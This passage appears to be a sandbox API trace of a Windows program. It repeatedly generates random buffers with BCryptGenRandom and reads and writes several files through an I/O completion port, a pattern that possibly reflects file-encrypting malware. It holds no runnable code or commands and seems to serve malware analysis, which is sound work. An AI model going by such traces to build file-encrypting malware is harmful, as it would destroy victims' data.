lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.150] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x53c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0165.150] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.161] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.162] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0165.162] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.162] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0165.163] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.163] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.163] free (_Block=0x3e305b8) [0165.163] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.163] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.163] free (_Block=0x1fa91d0) [0165.163] free (_Block=0x1fa2ed8) [0165.163] free (_Block=0x1fa90b8) [0165.163] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0165.164] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.171] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.171] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.171] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0165.172] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.172] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.172] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0165.172] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.172] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.172] free (_Block=0x3e305b8) [0165.172] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.172] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.173] free (_Block=0x1fa91d0) [0165.173] free (_Block=0x1fa2ed8) [0165.173] free (_Block=0x1fa90b8) [0165.173] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0165.173] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.178] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x1950, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0165.178] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.189] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.190] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0165.190] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.190] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0165.191] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.191] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.191] free (_Block=0x3e305b8) [0165.191] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.191] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.191] free (_Block=0x1fa91d0) [0165.191] free (_Block=0x1fa2ed8) [0165.191] free (_Block=0x1fa90b8) [0165.191] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0165.192] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.203] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.203] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.203] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0165.203] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.204] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0165.204] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.204] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.204] free (_Block=0x3e305b8) [0165.204] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.204] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.205] free (_Block=0x1fa91d0) [0165.205] free (_Block=0x1fa2ed8) [0165.205] free (_Block=0x1fa90b8) [0165.205] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0165.205] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.219] CloseHandle (hObject=0x2a4) returned 1 [0165.220] free (_Block=0x1ff1e60) [0165.220] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.230] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.231] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0165.231] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.232] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0165.232] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.232] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.232] free (_Block=0x3e305b8) [0165.232] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.232] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.233] free (_Block=0x1fa91d0) [0165.233] free (_Block=0x1fa2ed8) [0165.233] free (_Block=0x1fa90b8) [0165.233] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0165.233] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.234] CloseHandle (hObject=0x308) returned 1 [0165.234] free (_Block=0x3d70450) [0165.234] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.235] CloseHandle (hObject=0x170) returned 1 [0165.235] free (_Block=0x3f70048) [0165.235] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.307] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x8a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0165.307] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.313] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0165.313] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.323] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.324] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.324] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0165.324] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.324] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.324] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0165.324] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.325] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.325] free (_Block=0x3e305b8) [0165.325] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.325] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.325] free (_Block=0x1fa91d0) [0165.325] free (_Block=0x1fa2ed8) [0165.325] free (_Block=0x1fa90b8) [0165.325] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.326] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.333] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.333] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0165.334] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.334] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0165.334] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.334] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.334] free (_Block=0x3e305b8) [0165.334] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.334] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.335] free (_Block=0x1fa91d0) [0165.335] free (_Block=0x1fa2ed8) [0165.335] free (_Block=0x1fa90b8) [0165.335] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0165.336] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.340] CloseHandle (hObject=0x2a4) returned 1 [0165.340] free (_Block=0x3df0008) [0165.340] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.347] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.348] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0165.348] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.348] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0165.349] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.349] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.349] free (_Block=0x3e305b8) [0165.349] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.349] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.349] free (_Block=0x1fa91d0) [0165.349] free (_Block=0x1fa2ed8) [0165.350] free (_Block=0x1fa90b8) [0165.350] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0165.350] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.368] CloseHandle (hObject=0x3cc) returned 1 [0165.369] free (_Block=0x3d70450) [0165.369] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.370] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1540, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.370] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.376] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x19f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0165.377] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.377] CloseHandle (hObject=0x2a4) returned 1 [0165.377] free (_Block=0x1ff1e60) [0165.377] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.408] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.409] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0165.409] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.409] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0165.409] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.410] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.410] free (_Block=0x3e305b8) [0165.410] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.410] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.410] free (_Block=0x1fa91d0) [0165.410] free (_Block=0x1fa2ed8) [0165.410] free (_Block=0x1fa90b8) [0165.410] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.411] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.412] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1a70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.412] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.424] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x195b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.425] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.426] CloseHandle (hObject=0x2a4) returned 1 [0165.426] free (_Block=0x3df0008) [0165.426] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.435] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.435] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0165.435] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.436] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0165.436] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.436] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.436] free (_Block=0x3e305b8) [0165.436] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.436] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.437] free (_Block=0x1fa91d0) [0165.437] free (_Block=0x1fa2ed8) [0165.437] free (_Block=0x1fa90b8) [0165.437] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.437] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.438] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1660, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.439] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.450] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x215a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.451] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.467] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x17b6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.468] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.469] CloseHandle (hObject=0x2a4) returned 1 [0165.469] free (_Block=0x3df0008) [0165.469] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.478] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.479] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.479] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0165.479] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.479] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.480] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0165.480] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.480] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.480] free (_Block=0x3e305b8) [0165.480] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.480] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.480] free (_Block=0x1fa91d0) [0165.480] free (_Block=0x1fa2ed8) [0165.481] free (_Block=0x1fa90b8) 